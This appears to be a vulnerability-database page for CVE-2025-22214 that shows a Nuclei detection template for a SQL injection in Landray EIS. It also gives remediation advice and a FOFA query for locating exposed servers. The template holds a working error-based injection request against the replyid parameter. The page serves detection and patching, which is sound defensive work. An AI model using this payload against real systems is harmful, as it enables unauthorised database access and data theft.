Landray EIS SQL注入漏洞
CVE-2025-22214
Verified
Description
Landray EIS 2001 through 2006 contains a SQL injection caused by unsanitized input in Message/fi_message_receiver.aspx?replyid=, letting attackers execute arbitrary SQL commands, exploit requires crafted input.
Severity
Critical
Published Date
February 11, 2026
Template Author
ark
CVE-2025-22214.yaml
id: CVE-2025-22214
info:
name: Landray EIS SQL注入漏洞
author: Ark
severity: critical
description: |
Landray EIS 2001 through 2006 contains a SQL injection caused by unsanitized input in Message/fi_message_receiver.aspx?replyid=, letting attackers execute arbitrary SQL commands, exploit requires crafted input.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Apply input validation and parameterized queries, update to the latest version if available.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-22214
metadata:
verified: true
max-request: 1
fofa-query: body="/jquery.landray.dialog.js"
tags: cve,cve2025,landray,sqli,intrusive,vuln,vkev
http:
- raw:
- |
GET /Message/fi_message_receiver.aspx?replyid=1%20and%201=CONVERT(VARCHAR(32),HASHBYTES('MD5','123'),2)--+ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains_all(body, "202CB962AC59075B964B07152D234B70", "varchar", "Landray")'
condition: and
# digest: 4a0a00473045022075692f6f9e032579be31982e73edf4da8186eebec657cfa64fb83cd7eadacaa9022100c8414f986aa71d99f1e0cc26ccfb6ea2e9a623a9a100aa946f8765c6b146eb0b:922c64590222798bb761d5b6d8e72950Remediation Steps
Apply input validation and parameterized queries, update to the latest version if available.